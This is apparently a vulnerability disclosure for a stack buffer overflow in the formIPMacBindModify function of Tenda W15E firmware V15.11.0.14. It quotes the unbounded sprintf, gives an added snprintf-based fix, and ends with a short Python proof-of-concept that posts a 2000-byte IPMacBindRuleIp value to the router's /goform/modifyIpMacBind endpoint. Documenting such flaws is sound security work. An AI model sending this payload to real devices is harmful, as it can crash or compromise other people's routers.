formIPMacBindModify.md

Overview

Affected version

W15EV1.0 V15.11.0.14

Vulnerability details

The Tenda W15EV1.0 V15.11.0.14 firmware has a stack overflow vulnerability in the formIPMacBindModify function. The ruleIndex, ip, mac and remark variables receive the IPMacBindRuleId, IPMacBindRuleIp, IPMacBindRuleMac and IPMacBindRuleRemark parameters from a POST request. Because the user controls the values of all four parameters, the statement

sprintf(
    (char *)tmp,
    "%s;1;%s;%s;name%d;%s",
    (const char *)ruleId,
    (const char *)ip,
    (const char *)mac,
    v6,
    (const char *)remark);

can cause a buffer overflow: sprintf performs no bounds checking, so user-provided IPMacBindRuleId, IPMacBindRuleIp, IPMacBindRuleMac and IPMacBindRuleRemark values can exceed the capacity of the tmp array and trigger the vulnerability.
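
A bounded version of the formatting step described above, as an added example (not code from the firmware or the original report): snprintf plus a truncation check rejects oversized fields instead of writing past the buffer. The function name build_bind_rule, the 256-byte RULE_BUF_SIZE and the sample inputs are assumptions; the page does not give the real size of tmp.

```c
#include <stdio.h>
#include <string.h>

/* Assumed capacity: the page does not state the real size of tmp. */
#define RULE_BUF_SIZE 256

/*
 * Build "<ruleId>;1;<ip>;<mac>;name<idx>;<remark>" into out.
 * Returns 0 on success, -1 if any input is missing or the formatted
 * rule would not fit (the caller should reject the request).
 */
int build_bind_rule(char *out, size_t out_size, const char *rule_id,
                    const char *ip, const char *mac, int idx,
                    const char *remark)
{
    if (!out || out_size == 0 || !rule_id || !ip || !mac || !remark)
        return -1;

    /* snprintf never writes more than out_size bytes, NUL included. */
    int n = snprintf(out, out_size, "%s;1;%s;%s;name%d;%s",
                     rule_id, ip, mac, idx, remark);

    /* n is the length the full string needs; n >= out_size means truncated. */
    if (n < 0 || (size_t)n >= out_size) {
        out[0] = '\0';   /* do not hand a partial rule to later code */
        return -1;
    }
    return 0;
}

int main(void)
{
    char tmp[RULE_BUF_SIZE];
    char long_ip[2001];

    /* Constructed inputs: one well-formed request, one oversized field. */
    memset(long_ip, 'a', sizeof long_ip - 1);
    long_ip[sizeof long_ip - 1] = '\0';

    int ok = build_bind_rule(tmp, sizeof tmp, "1", "192.168.0.10",
                             "AA:BB:CC:DD:EE:FF", 1, "printer");
    printf("valid request   -> %d \"%s\"\n", ok, tmp);

    int bad = build_bind_rule(tmp, sizeof tmp, "1", long_ip,
                              "AA:BB:CC:DD:EE:FF", 1, "printer");
    printf("oversized field -> %d \"%s\"\n", bad, tmp);
    return 0;
}
```

Rejecting on truncation, rather than silently storing a cut-off rule, keeps a malformed binding entry out of the configuration.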


POC

import requests

# Address of the device under test
ip = "192.168.84.101"
url = "http://" + ip + "/goform/modifyIpMacBind"
# Oversized value for one of the parameters that is formatted into tmp
payload = b"a" * 2000

data = {
    'IPMacBindRuleIp': payload,
}
response = requests.post(url, data=data)
print(response.text)
